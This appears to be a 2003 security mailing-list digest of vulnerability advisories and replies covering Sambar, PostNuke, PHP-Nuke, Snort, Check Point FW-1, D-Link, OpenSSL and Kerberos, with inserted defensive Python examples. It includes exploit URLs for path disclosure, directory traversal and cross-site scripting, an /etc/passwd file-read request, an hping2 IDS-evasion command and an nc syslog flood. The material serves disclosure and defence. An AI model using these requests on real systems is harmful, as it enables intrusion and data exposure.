Re: Vulnerability (critical): Digital signature for Adobe Acrobat/Reader plug-in can be forged

2003-03-27 Thread Dan Harkless

Vladimir Katalov <[EMAIL PROTECTED]> writes:
>   We were able to write a 'fake' plug-in "fakecert.api" which does
>   nothing, but being loaded by Adobe Acrobat (and Reader) 4 and 5
>   as the certified one even in 'trusted' mode, though we don't have
>   a 'Reader Integration Key' (this plug-in has been provided only to
>   Adobe and CERT). When installed into 'plug_ins' subfolder, plug-in
>   is being loaded every time when Adobe Acrobat (or Reader) starts, and
>   shows a simple message box.

For those of us not familiar with Acrobat plugins, is there some facility
for the program retrieving/installing plugins automatically, or, to exploit
this would you need to entice a user to manually place your .api file in
their "plug_ins" directory (or run an installer program that would do so, in
which case you could run arbitrary code anyway in the installer)?

--
Dan Harkless
[EMAIL PROTECTED]
http://harkless.org/dan/


PostNuke Sensitive Information Disclosure

2003-03-27 Thread rkc
Title: PostNuke path disclosure, and... (db name).
Version: 0.7.2.3-Phoenix (other)
Problem: 

A vulnerability has been found in PostNuke (v0.7.2.3-Phoenix) which allows 
users to determine the physical path of this CMS. 

This vulnerability would allow a remote user to determine the full path to 
the web root directory and other information, like the database name (!) 

Example: 

http://www.target.com/modules.php?op=modload&name=Members_List&file=index&letter=All&sortby=uname1234 

Change 1234 to anything. 

- 

If you are looking for: 

* Path disclosure in versions 0.7.2.2 & 0.7.2.1:
(Two simple examples) 

http://www.target.com/modules.php?op=modload&name=Stats&file= 

http://www.target.com/modules.php?op=modload&name=Members_List&file=index&letter=Svi&sortby=uname1234 

(Change 1234 to anything). 

(not.always) 

- 

Solutions: 

Change the Member_List privileges to admins only (?)
Deactivate the Member_List module (?) 

- 

Greetz ! 

rkc 

~
Rep. Argentina
6765656B207374796C65
StFU, and RtFM !


Re: @(#)Mordred Labs advisory - PHP for Win32: buffer overflow in openlog() function

2003-03-27 Thread Jason Brooke
> III. Workaround
> 
> Not available at the time of writing.


in php.ini: 

disable_functions = openlog 





Problems with Snort-1.9.1

2003-03-27 Thread Toby Miller
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Problem: Snort-1.9.1 using a default snort.conf configuration does
not detect certain crafted packets.

Details: Snort-1.9.1 does not detect packets when the SYN, FIN and ECN
echo bits are set. The following is an example of such a packet:

12:37:12.386797 10.1.1.6.18250 > 10.1.1.2.21536: SFE [tcp sum ok]
1178601305:1178601305(0) win 512 (ttl 104, id 5100, len 40)
0x0000   4500 0028 13ec 0000 6806 28db 0a01 0106        E..(....h.(.....
0x0010   0a01 0102 474a 5420 4640 0759 0bec 8b73        ....GJT F@.Y...s
0x0020   5043 0200 1735 0000                            PC...5..


Testing: In order to set this I used hping2 and the following
switches:

hping2 -t 104 -N -W -s 18245 -p 21536 -S -F -X 'IP Address'

When performing this test I found that Snort would detect a SYN,FIN
packet provided that the ECN echo packet was not set in the same
packet.

Problem: With the detect_scan option set in the stream4 preprocessor
Snort would not detect these packets.

Impact: Snort will not catch certain scans or attacks using these
TCP/IP flags.

Solution: Upgrade to Snort-2.0.0rc1
(www.snort.org/dl/snort-2.0.0rc1.tar.gz), or if you need to use
Snort-1.9.1 to detect these packets, one would have to enable the
portscan preprocessor or delete the detect_scans option in the stream4
preprocessor.

I would like to thank Chris Green of Snort for responding quickly to
this problem.

Thanks,
Toby

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 6.5.8 for non-commercial use 

iQA/AwUBPoJs/VLhpjRJgUE5EQL8LwCg3eQVZYRgOtQOCZInFeZZDkh3JIUAoJAk
Bzgznvqfb7PhO5HML+/AXw2T
=BYxI
-END PGP SIGNATURE-
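Worked example, added here and not part of Toby's report, of Snort or of hping2: the Python below decodes the 40 bytes from the hex dump above, verifies the IP and TCP checksums (the "[tcp sum ok]" in the tcpdump line), and contrasts a rule that requires the flag byte to equal exactly SYN|FIN with one that tests the two bits and ignores the ECN bits. The packet bytes are the report's own; the function names and the letter order used for printing flags are this example's choices.

```python
import struct

# Constructed from the report's hex dump: 20-byte IP header + 20-byte TCP header
# (10.1.1.6:18250 -> 10.1.1.2:21536, ttl 104, id 5100, flags SYN+FIN+ECE).
PACKET_HEX = ("4500 0028 13ec 0000 6806 28db 0a01 0106"
              "0a01 0102 474a 5420 4640 0759 0bec 8b73"
              "5043 0200 1735 0000")
PACKET = bytes.fromhex(PACKET_HEX.replace(" ", ""))

# TCP flag bits: RFC 793 plus the RFC 3168 ECN bits (ECE, CWR).
FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
# Letter order as older tcpdump prints it ("SFE" for this packet).
FLAG_LETTERS = ((SYN, "S"), (FIN, "F"), (RST, "R"), (PSH, "P"),
                (ACK, "A"), (URG, "U"), (ECE, "E"), (CWR, "W"))


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum; returns 0 when run over data that already carries its checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_packet(pkt: bytes) -> dict:
    """Pull out the IP/TCP fields a flag-based rule would look at, plus checksum status."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ip_id = struct.unpack("!HH", pkt[2:6])
    ttl, proto = pkt[8], pkt[9]
    tcp = pkt[ihl:total_len]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    # TCP pseudo-header for the TCP checksum: src, dst, zero, protocol, TCP length.
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, proto, len(tcp))
    return {
        "src": ".".join(map(str, pkt[12:16])),
        "dst": ".".join(map(str, pkt[16:20])),
        "ttl": ttl, "id": ip_id, "sport": sport, "dport": dport, "seq": seq,
        "flags": tcp[13],
        "window": struct.unpack("!H", tcp[14:16])[0],
        "ip_sum_ok": ones_complement_checksum(pkt[:ihl]) == 0,
        "tcp_sum_ok": ones_complement_checksum(pseudo + tcp) == 0,
    }


def flag_string(flags: int) -> str:
    return "".join(letter for bit, letter in FLAG_LETTERS if flags & bit)


def exact_syn_fin(flags: int) -> bool:
    """Rule that needs the flag byte to be exactly SYN|FIN (0x03): 0x43 slips past it."""
    return flags == (SYN | FIN)


def masked_syn_fin(flags: int) -> bool:
    """Rule that tests only the SYN and FIN bits; ECE/CWR (or anything else) do not matter."""
    return (flags & (SYN | FIN)) == (SYN | FIN)


if __name__ == "__main__":
    info = parse_packet(PACKET)
    print("%s:%d -> %s:%d flags=%s ip_sum_ok=%s tcp_sum_ok=%s" % (
        info["src"], info["sport"], info["dst"], info["dport"],
        flag_string(info["flags"]), info["ip_sum_ok"], info["tcp_sum_ok"]))
    print("exact rule fires:", exact_syn_fin(info["flags"]))
    print("masked rule fires:", masked_syn_fin(info["flags"]))
```

The general lesson is that any SYN+FIN combination is anomalous, so a rule should test those two bits and mask everything else; in Snort's rule language that is the `flags:SF,12;` form, where the `,12` tells it to ignore the two reserved bits that the ECN bits occupy.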





Re: Check Point FW-1: attack against syslog daemon possible

2003-03-27 Thread Dr. Peter Bieringer
Hi again,

now we have finished the investigation of FW-1 4.1 (SP6) with the following 
result:

In our lab the syslog daemon of Check Point FW-1 4.1 didn't crash when 
"/dev/urandom" was sent via "nc", but this floods the log without any 
rate limiting.

Also the syslog messages were not filtered.

Note also that improving the ruleset didn't help in cases where 
trusted and untrusted nodes share the same network, because in UDP 
packets the sender IP address can be spoofed (successfully tested with 
"sendip" against FW-1 4.1).

To avoid spoofing, only MAC-based ACLs on gateways (if available) will help, 
or establishing a dedicated (V)LAN for trusted sources only.

We've updated our advisory once again:

http://www.aerasec.de/security/advisories/txt/checkpoint-fw1-ng-fp3-syslog-crash.txt
http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
Hope this helps,
Peter
--
Dr. Peter Bieringer                          Phone:    +49-8102-895190
AERAsec Network Services and Security GmbH   Fax:      +49-8102-895199
Wagenberger Straße 1                         Mobile:   +49-174-9015046
D-85662 Hohenbrunn                           E-Mail:   [EMAIL PROTECTED]
Germany                                      Internet: http://www.aerasec.de
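Added example, not Check Point's or AERAsec's code: a syslog intake that closes the two gaps Peter describes, the missing rate limiting and the unfiltered message content, and that shows why a per-source limit alone is not enough when UDP source addresses can be spoofed. The token bucket, the global cap and the printable-ASCII filter are this example's own design; the traffic fed in by demo() is constructed, not captured.

```python
import time
from typing import Optional
from dataclasses import dataclass, field

MAX_MSG = 1024  # classic BSD syslog (RFC 3164) message size limit


@dataclass
class TokenBucket:
    """Allows `burst` messages at once, then `rate` messages per second on average."""
    rate: float
    burst: int
    tokens: float = field(init=False)
    last: Optional[float] = field(init=False, default=None)

    def __post_init__(self):
        self.tokens = float(self.burst)

    def allow(self, now: float) -> bool:
        if self.last is not None and now > self.last:
            self.tokens = min(float(self.burst), self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


def sanitize(raw: bytes) -> str:
    """Keep printable ASCII only, so random bytes cannot inject newlines or
    terminal escape sequences into the log file (each bad byte becomes '?')."""
    text = raw[:MAX_MSG].decode("ascii", errors="replace")
    return "".join(ch if 0x20 <= ord(ch) < 0x7F else "?" for ch in text)


class SyslogIntake:
    def __init__(self, per_source_rate, per_source_burst, global_rate, global_burst):
        self._cfg = (per_source_rate, per_source_burst)
        self._per_source = {}          # unbounded here; a real daemon caps this map
        self._global = TokenBucket(global_rate, global_burst)
        self.accepted = []
        self.dropped = {"per_source": 0, "global": 0}

    def receive(self, src_ip: str, raw: bytes, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        bucket = self._per_source.setdefault(src_ip, TokenBucket(*self._cfg))
        if not bucket.allow(now):      # one chatty (or flooding) host is throttled first
            self.dropped["per_source"] += 1
            return False
        if not self._global.allow(now):  # spoofed sources each get a fresh bucket, so
            self.dropped["global"] += 1  # a global cap is what actually bounds the log
            return False
        self.accepted.append((src_ip, sanitize(raw)))
        return True


def demo() -> dict:
    """Constructed traffic, all at one instant so the counts are deterministic."""
    intake = SyslogIntake(per_source_rate=10, per_source_burst=5,
                          global_rate=100, global_burst=20)
    now = 100.0
    for i in range(50):                       # one host floods 50 messages of junk bytes
        intake.receive("192.0.2.10", bytes([i % 256]) * 64, now)
    intake.receive("192.0.2.20", b"<34>Mar 27 12:00:00 gw sshd[42]: session opened", now)
    for i in range(30):                       # 30 distinct (spoofable) sources at once
        intake.receive("203.0.113.%d" % i, b"<13>spoofed message", now)
    return {"accepted": len(intake.accepted), **intake.dropped,
            "first_accepted": intake.accepted[0][1]}


if __name__ == "__main__":
    print(demo())
```

In the constructed run the flooding host gets only its burst of 5 through, the well-behaved host is still heard, and the 30 single-message spoofed sources exhaust the global bucket after 14 more, which is the point: per-source accounting is defeated by spoofing, so the global limit and the link-layer controls Peter mentions are what actually protect the log.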


[SCSA-012] Multiple vulnerabilities in Sambar Server

2003-03-27 Thread Grégory




Security Corporation Security Advisory [SCSA-012]


PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior 



DESCRIPTION


"Sambar Server is the new standard in high performance multi-functional 
servers with features rivaling other commercial products selling 
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000, 
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net) 


DETAILS & EXPLOITS



¤ Path Disclosure :

Sambar's default installation of the CGI bin directory contains
a testcgi.exe and an environ.pl that allow remote users to view
information regarding the operating system and the 
web server's directory.

These vulnerabilities can be triggered by a remote user submitting
a specially crafted HTTP request.


- Exploits :

http://[target]/cgi-bin/environ.pl

http://[target]/cgi-bin/testcgi.exe


Will produce the following output:

- environ.pl : 
--

Sambar Server CGI Environment Variables 
GATEWAY_INTERFACE: CGI/1.1 
PATH_INFO: 
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl 
QUERY_STRING: 
REMOTE_ADDR: 127.0.0.1 
REMOTE_HOST: 
REMOTE_USER: 
REQUEST_METHOD: GET 
DOCUMENT_NAME: environ.pl 
DOCUMENT_URI: /cgi-bin/environ.pl 
SCRIPT_NAME: /cgi-bin/environ.pl 
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl 
SERVER_NAME: localhost 
SERVER_PORT: 80 
SERVER_PROTOCOL: HTTP/1.1 
SERVER_SOFTWARE: SAMBAR 
CONTENT_LENGTH: 0 
CONTENT: 


- testcgi.exe :
---

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING 
PATH_INFO 
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe 
SCRIPT_NAME /cgi-bin/testcgi.exe 
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe 
DOCUMENT_ROOT C:/sambar53/docs/ 
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
REMOTE_ADDR 127.0.0.1 
REMOTE_HOST 
SERVER_NAME localhost 
SERVER_PROTOCOL HTTP/1.1 
SERVER_SOFTWARE SAMBAR 
CONTENT_TYPE 




¤ Directory Disclosure :

Other security vulnerabilities were found in Sambar which allow an
attacker to reveal the contents of files and directories 
on the web server, even when they should not be revealed.

These vulnerabilities can be simply exploited by requesting a 
specially crafted URL using the iecreate.stm and ieedit.stm
applications with a '../' appended.

- Exploits :

http://[target]/sysuser/docmgr/iecreate.stm?template=../

http://[target]/sysuser/docmgr/ieedit.stm?url=../





¤ Cross Site Scripting :

Many exploitable bugs were found in Sambar Server which cause script
execution on the client's computer when following a crafted URL.

This kind of attack, known as a "Cross-Site Scripting Vulnerability", is 
present in many sections of the web site; an attacker can input 
specially crafted links and/or other malicious scripts.

- Exploits : 

http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

http://[target]/netutils/whodata.stm?sitename=[hostile_code]

http://[target]/netutils/findata.stm?user=[hostile_code]

http://[target]/netutils/findata.stm?host=[hostile_code]

http://[target]/isapi/testisa.dll?check1=[hostile_code]

http://[target]/cgi-bin/environ.pl?param1=[hostile_code]

http://[target]/samples/search.dll?query=[hostile_code]&logic=AND

http://[target]/wwwping/index.stm?wwwsite=[hostile_code]

http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?query=[hostile_c

Re: @(#)Mordred Labs advisory - Integer overflow in PHP memory allocator

2003-03-27 Thread Dullien
Hey Mr. Mordred, all,

> In PHP emalloc() function implements the error safe wrapper around
> malloc().
> Unfortunately this function suffers from an integer overflow and
> considering the fact that emalloc() is used in many places around PHP
> source code, it may lead to many serious security issues.

IIRC this bug was mentioned in a talk at last summer's Black Hat conference.

http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#Dowd

Cheers,
[EMAIL PROTECTED]

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Please smile! Photo gallery online with GMX, no homepage of your own required!



Re: PHPNuke viewpage.php allows Remote File retrieving

2003-03-27 Thread admin
In-Reply-To: <[EMAIL PROTECTED]>

>From: Christopher Warner <[EMAIL PROTECTED]>
>
>If you could follow up on this and give more details (versions affected)
>etc etc; as it stands I'm gonna confirm that viewpage.php hasn't existed
>for quite some time and that this is a pretty pointless advisory.
>
>Thanks,
>Christopher Warner
>

This is NOT a phpnuke file and never has been.  It can be traced to 
NukeStyles (http://www.nukestyles.com/).  See this thread/discussion: 
http://nukecops.com/postx1337-0-0.html


D-Link DI-614 wireless router crash/reboots

2003-03-27 Thread Thomas Reinke
A user of ours has reported that the D-Link DI-614+
Wireless router/firewall is vulnerable to several old,
well known vulnerabilities.  The user was able to reproduce
the problem multiple times with consistent results.  Not
having the equipment, we have NOT reproduced these ourselves,
and would appreciate if anyone can corroborate these
problems.

The vendor was notified on March 13th and has not responded
back.

Both tests causing problems were reproduced using the Nessus
test suite. Test IDs are Nessus test ID numbers and are
supplied for reference.

Nestea:  A Nestea attack applied to the device causes the
device to spontaneously reboot. The device is out of
operation for only a few seconds and is then back in
service with no other known impact.
Ref: http://www.securityspace.com/smysecure/catid.html?id=10148

Linux 0 length fragment bug: Sending the appropriate packet
causes the device to crash requiring a power off-on cycle
to recover.
Ref: http://www.securityspace.com/smysecure/catid.html?id=10134

If anyone can support that their device does or does not behave
similarly it would be appreciated.
Thomas
--
SecuritySpace
http://www.securityspace.com



Re: PHPNuke viewpage.php allows Remote File retrieving

2003-03-27 Thread Kevin
I have just checked 5 different 6.5 installs, some of which have been 
upgraded from previous 6.5 betas, and this file most definitely does not 
exist under 6.5

[EMAIL PROTECTED] wrote:

> From: Jim Geovedi <[EMAIL PROTECTED]>
> Subject: Re: PHPNuke viewpage.php allows Remote File retrieving
> Organization: Will Work For Bandwidth, Inc.
>
> On Tue, 25 Mar 2003 11:59:26 -0600 DaiTengu wrote:
>
> > > viewpage.php is a part of PHPNuke.
> > > The Script allows an attacker to view all files on the System.
> > > Example:
> > >
> > > http://server.com/viewpage.php?file=/etc/passwd
> >
> > umm, what version of phpNuke is vulnerable to this? as far as I'm
> > aware, there has not been any viewpage.php since before 5.0...
> > I believe this was reported then as well.
> > regardless, this is not true with 6.0
>
> it's repeatable on PHP-Nuke 6.5.
>
> --
> Jim Geovedi <[EMAIL PROTECTED]>

I have the vanilla 6.5 and there is no viewpage.php file in the package 
that I can find.  Are you sure that this isn't in an addon?  Or possibly 
left over from a previous version that was never cleared out when phpnuke 
was updated?
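Added example, not Sambar's, PHP-Nuke's or any poster's code, covering the two file-disclosure reports in this digest: Sambar's docmgr pages opened with "template=../" and the viewpage.php "file=/etc/passwd" report above. Both are the same defect, a user-supplied name joined to a fixed directory without checking that the result stays inside it. resolve_under_root() is this example's own containment check; it rejects "../", backslash variants, absolute paths, drive letters, NUL bytes and symlinks that lead outside, and restricts the served file types. The document root, its files and the request list are constructed in a temporary directory so the example runs offline.

```python
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """The requested name would leave the document root or is not a servable file."""


def resolve_under_root(root, requested: str,
                       allowed_suffixes=(".stm", ".html", ".txt")) -> Path:
    """Map a user-supplied relative name to a file strictly inside `root`."""
    root_path = Path(root).resolve()
    if "\x00" in requested or ":" in requested:
        raise UnsafePath("NUL byte or drive letter in %r" % requested)
    normalized = requested.replace("\\", "/")        # treat Windows separators like "/"
    if normalized.startswith("/"):
        raise UnsafePath("absolute path %r" % requested)
    # resolve() follows symlinks and collapses "..", so a link inside the root that
    # points outside fails the same containment test as "../" does.
    candidate = (root_path / normalized).resolve()
    if root_path not in candidate.parents:
        raise UnsafePath("%r escapes %s" % (requested, root_path))
    if candidate.suffix.lower() not in allowed_suffixes:
        raise UnsafePath("disallowed file type %r" % candidate.suffix)
    if not candidate.is_file():
        raise FileNotFoundError(str(candidate))
    return candidate


def demo() -> dict:
    """Build a constructed docroot with a file outside it and classify sample requests."""
    base = Path(tempfile.mkdtemp(prefix="docroot-"))
    root = base / "docs"
    (root / "sub").mkdir(parents=True)
    (root / "index.stm").write_text("<h1>welcome</h1>")
    (root / "sub" / "page.stm").write_text("sub page")
    (base / "secret.txt").write_text("outside the web root")
    try:
        (root / "link.stm").symlink_to(base / "secret.txt")   # link pointing outside
    except OSError:
        pass   # no symlink support on this platform: that case reports "missing"
    requests = ["index.stm", "sub/page.stm", "sub/../index.stm", "../secret.txt",
                "sub/../../secret.txt", "..\\secret.txt", "/etc/passwd",
                "C:\\boot.ini", "link.stm", "index.stm\x00.jpg", "missing.stm"]
    outcome = {}
    for req in requests:
        try:
            outcome[req] = "served " + resolve_under_root(root, req).name
        except UnsafePath:
            outcome[req] = "rejected"
        except FileNotFoundError:
            outcome[req] = "missing"
    return outcome


if __name__ == "__main__":
    for req, result in demo().items():
        print("%-24r %s" % (req, result))
```

The order of the checks matters: containment is tested on the fully resolved path, after symlinks and ".." have been collapsed, and only then is the file type and existence examined, so a name that escapes the root is rejected before anything on disk is consulted.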

 





Immunix Secured OS 7+ openssl update

2003-03-27 Thread Immunix Security Team
---
Immunix Secured OS Security Advisory

Packages updated:   openssl, openssh, mod_ssl
Affected products:  ImmunixOS 6.2, 7.0, 7+
Bugs fixed: CAN-2003-0131 CAN-2003-0147
Date:   Wed Mar 26 2003
Advisory ID:IMNX-2003-7+-001-01
Author: Seth Arnold <[EMAIL PROTECTED]>
---

Description:
  This update fixes two problems with openssl packages and recompiles
  openssh and mod_ssl against the new version of openssl. Quoting from
  the OpenSSL advisory:
Vlastimil Klima, Ondrej Pokorny, and Tomas Rosa have come up with an
extension of the "Bleichenbacher attack" on RSA with PKCS #1 v1.5
padding as used in SSL 3.0 and TLS 1.0. Their attack requires the
attacker to open millions of SSL/TLS connections to the server under
attack; the server's behaviour when faced with specially made-up RSA
ciphertexts can reveal information that in effect allows the attacker
to perform a single RSA private key operation on a ciphertext of
its choice using the server's RSA key. Note that the server's RSA
key is not compromised in this attack.
  The other problem, quoting from the CERT advisory: David Brumley and Dan
Boneh, researchers at Stanford University, have written a paper that
demonstrates a practical attack that can be used to extract private
keys from vulnerable RSA applications.  Using statistical techniques
and carefully measuring the amount of time required to complete an
RSA operation, an attacker can recover one of the factors (q) of the
RSA key. [...] Under optimal conditions, a 1024-bit RSA private key
was extracted in approximately two hours using ~350,000 guesses.

  References: http://www.kb.cert.org/vuls/id/997481
  http://www.openssl.org/news/secadv_20030319.txt

Package names and locations:
  Precompiled binary packages for Immunix 7+ are available at:
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/mod_ssl-2.8.12-1.7_imnx_2.i386.rpm
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-3.4p1-1_imnx_10.i386.rpm
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-askpass-3.4p1-1_imnx_10.i386.rpm
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-clients-3.4p1-1_imnx_10.i386.rpm
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-server-3.4p1-1_imnx_10.i386.rpm
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssl-0.9.6g-1_imnx_2.i386.rpm
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssl-devel-0.9.6g-1_imnx_2.i386.rpm
  http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssl-perl-0.9.6g-1_imnx_2.i386.rpm

Immunix OS 7+ md5sums:
  17a8a4c07a421c0b0a98369d77d06ed4  openssh-3.4p1-1_imnx_10.i386.rpm
  59bffcfb9ca2fbe74e9d2eb3568d134a  openssh-askpass-3.4p1-1_imnx_10.i386.rpm
  37d2acf53c72ee23e5f9576557a5fd6e  openssh-clients-3.4p1-1_imnx_10.i386.rpm
  d61f9a2c3fc41f8dded88f2b84be2a83  openssh-server-3.4p1-1_imnx_10.i386.rpm
  ccb8fa2cce44efa243d368cf7785b9cf  openssl-0.9.6g-1_imnx_2.i386.rpm
  0ba9e8a2c9728a64ee4a89aa2cecd804  openssl-devel-0.9.6g-1_imnx_2.i386.rpm
  fa6f0d1dde78b941a8bc9147dfd7a5b6  openssl-perl-0.9.6g-1_imnx_2.i386.rpm
  490d4340e153daff3e3e4e548321e5af  mod_ssl-2.8.12-1.7_imnx_2.i386.rpm


GPG verification:   
  Our public key is available at .   

NOTE:
  Ibiblio is graciously mirroring our updates, so if the links above are
  slow, please try:
ftp://ftp.ibiblio.org/pub/Linux/distributions/immunix/
  or one of the many mirrors available at:
http://www.ibiblio.org/pub/Linux/MIRRORS.html

  ImmunixOS 6.2 is no longer officially supported.
  ImmunixOS 7.0 is no longer officially supported.

Contact information:
  To report vulnerabilities, please contact [EMAIL PROTECTED] WireX 
  attempts to conform to the RFP vulnerability disclosure protocol
  .
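Added example, not OpenSSL's or Immunix's code: the Brumley and Boneh attack quoted above times the private-key operation m = c^d mod n on ciphertexts the attacker chooses. The standard countermeasure is RSA blinding: multiply the ciphertext by r^e for a fresh random r, run the private exponentiation on that masked value, and divide the result by r afterwards, so the timing depends on a quantity the attacker never sees. The Python below carries that through with textbook RSA; the key is built from two small constructed primes for illustration only (real keys are 2048 bits or more and use proper padding), and the function names are this example's own. It needs Python 3.8+ for pow(x, -1, m).

```python
import secrets
from math import gcd


def make_key(p: int, q: int, e: int = 65537) -> dict:
    """Textbook RSA key from two primes (constructed demo values, far too small for real use)."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    return {"n": n, "e": e, "d": pow(e, -1, phi)}   # modular inverse: Python 3.8+


def encrypt(m: int, key: dict) -> int:
    return pow(m, key["e"], key["n"])


def decrypt_unblinded(c: int, key: dict) -> int:
    """Exponentiation directly on the attacker-chosen ciphertext c: the timing of this
    call is what the Brumley-Boneh attack measures."""
    return pow(c, key["d"], key["n"])


def blind(c: int, key: dict, r: int) -> int:
    """Mask c with r^e; the private exponentiation then runs on a value the attacker
    cannot predict because r is fresh and secret."""
    return (c * pow(r, key["e"], key["n"])) % key["n"]


def decrypt_blinded(c: int, key: dict, r: int = None) -> int:
    n = key["n"]
    if r is None:                     # fresh random r coprime to n for every call
        r = secrets.randbelow(n - 2) + 2
        while gcd(r, n) != 1:
            r = secrets.randbelow(n - 2) + 2
    # (c * r^e)^d = c^d * r^(ed) = m * r  (mod n), since r^(ed) = r mod n
    m_times_r = pow(blind(c, key, r), key["d"], n)
    return (m_times_r * pow(r, -1, n)) % n   # strip the blinding factor


# Constructed demo primes; any two distinct primes with gcd(e, phi) == 1 work.
KEY = make_key(1000003, 1000033)


if __name__ == "__main__":
    m = 123456789
    c = encrypt(m, KEY)
    print("unblinded:", decrypt_unblinded(c, KEY) == m)
    print("blinded:  ", decrypt_blinded(c, KEY) == m)
    print("bases seen by the exponentiation differ per call:",
          blind(c, KEY, 2) != blind(c, KEY, 3))
```

Both paths return the same plaintext; the difference is what the modular exponentiation actually operates on. Without blinding that base is c, chosen by the attacker, which is what makes the timing statistics usable; with blinding it is c * r^e for a different r each time, so repeated measurements on the same c no longer line up.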




RE: WebDav Exploit ffs

2003-03-27 Thread Exurity Debugs
I don't believe your shell code will work on other Kernel32.dll than the
version with the following ImageBase:
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..

Because your code is reversed as:

loc_8F:
mov eax, [esi]
add eax, ebp
cmp dword ptr [eax], 50746547h
jnz short loc_C0
cmp dword ptr [eax+4], 41636F72h
jnz short loc_C0
cmp dword ptr [eax+8], 65726464h
jnz short loc_C0
mov eax, [edi+24h]
add eax, ebp
movzx   ebx, word ptr [eax+edx*2]
mov eax, [edi+1Ch]
add eax, ebp
mov ebx, [eax+ebx*4]
add ebx, ebp

; should jump to found
loc_C0:
add esi, 4
inc edx
cmp edx, [edi+18h]
jnz short loc_8F
; then reached all and could not find, so find another version
So, if the Kernel32.dll happens to be different than the default, it will
simply crash without going too far.
Best regards
Peter Huang
Jumpable, Callable & Overflowing XPoson, New Exploitation Technology on the
way



[RHSA-2003:051-01] Updated kerberos packages fix various vulnerabilities

2003-03-27 Thread bugzilla
-
   Red Hat Security Advisory

Synopsis:  Updated kerberos packages fix various vulnerabilities
Advisory ID:   RHSA-2003:051-01
Issue date:2003-03-26
Updated on:2003-03-26
Product:   Red Hat Linux
Keywords:  krb5
Cross references:  RHSA-2003:052
Obsoletes: RHSA-2003:020
CVE Names: CAN-2003-0028 CAN-2003-0036 CAN-2003-0058 CAN-2003-0059 
CAN-2003-0072 CAN-2003-0082 CAN-2003-0138 CAN-2003-0139
-

1. Topic:

Updated Kerberos packages fix a number of vulnerabilities found in MIT
Kerberos.

2. Relevant releases/architectures:

Red Hat Linux 6.2 - i386
Red Hat Linux 7.0 - i386
Red Hat Linux 7.1 - i386
Red Hat Linux 7.2 - i386, ia64
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Kerberos is a network authentication system. The MIT Kerberos team
released an advisory describing a number of vulnerabilities that affect the
kerberos packages shipped by Red Hat. These vulnerabilities include:

An integer signedness error in the ASN.1 decoder before version 1.2.5
allows remote attackers to cause a denial of service (crash) via a large
unsigned data element length, which is later used as a negative value. The
Common Vulnerabilities and Exposures project has assigned the name
CAN-2002-0036 to this issue. Red Hat Linux 8.0 and later are not affected
by this issue.

The Key Distribution Center (KDC) before version 1.2.5 allows remote,
authenticated attackers to cause a denial of service (crash) on KDCs within
the same realm using a certain protocol request that causes a null
dereference (CAN-2003-0058). Red Hat Linux 8.0 and later are not affected
by this issue.

The Key Distribution Center (KDC) allows remote, authenticated attackers to
